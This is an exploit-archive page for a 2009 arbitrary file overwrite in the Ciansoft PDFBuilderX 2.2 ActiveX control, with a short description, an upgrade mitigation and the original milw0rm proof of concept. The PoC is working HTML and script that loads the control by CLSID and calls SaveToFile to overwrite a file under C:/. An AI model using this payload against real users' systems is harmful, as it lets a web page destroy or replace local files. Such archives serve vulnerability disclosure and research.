header-logo
Suggest Exploit
vendor:
PDFBuilderX
by:
Alfons Luja
7.5
CVSS
HIGH
Arbitrary File Overwrite
264
CWE
Product Name: PDFBuilderX
Affected Version From: 2.2
Affected Version To: 2.2
Patch Exists: YES
Related CWE: N/A
CPE: a:ciansoft:pdfbuilderx
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2009

Ciansoft PDFBuilderX 2.2 Arbitrary File Overwrite

A vulnerability in Ciansoft PDFBuilderX 2.2 allows an attacker to overwrite arbitrary files on the system. This is due to the application not properly validating user-supplied input when saving a file. An attacker can exploit this vulnerability by convincing a user to open a maliciously crafted HTML file. Successful exploitation could result in the attacker overwriting arbitrary files on the system.

Mitigation:

Upgrade to the latest version of Ciansoft PDFBuilderX.
Source

Exploit-DB raw data:

<b>   
    Ciansoft PDFBuilderX 2.2 Arbitrary File Overwrite    <br/>
                         p0c                            <br/>
                     Alfons Luja                        <br/>
            Pozdrowienia dla odFiecznych fanÓf          <br/>                                   
                      Tesw Eporue                       <br/>
                        -9002-                          <br/>
                         l00l                           <br/>  
<b/>
<object classid='clsid:00E7C7F8-71E2-498A-AB28-A3D72FC74485' id='kupa'></object>
<script>
/*
 Class PDFDoc
 GUID: {00E7C7F8-71E2-498A-AB28-A3D72FC74485}
 RegKey Safe for Script: False
 RegKey Safe for Init: False
 Implements IObjectSafety: True
 IDisp Safe:  Safe for untrusted: caller,data  
 IPStorage Safe:  Safe for untrusted: caller,data  
 KillBitSet: False
 vend0r : www.ciansoft.com
*/ 
try{
    var obj = document.getElementById('kupa');
    obj.AddPage(1);
    obj.SaveToFile("C:/system_.ini");
    window.alert('Aplauz !!! g0rion pownsYa l0l - n0wH Check ya C:');
} catch(err){  window.alert('Poc failed'); }
</script>

# milw0rm.com [2009-01-15]

Navigation

Suggest Exploit

Services By CQR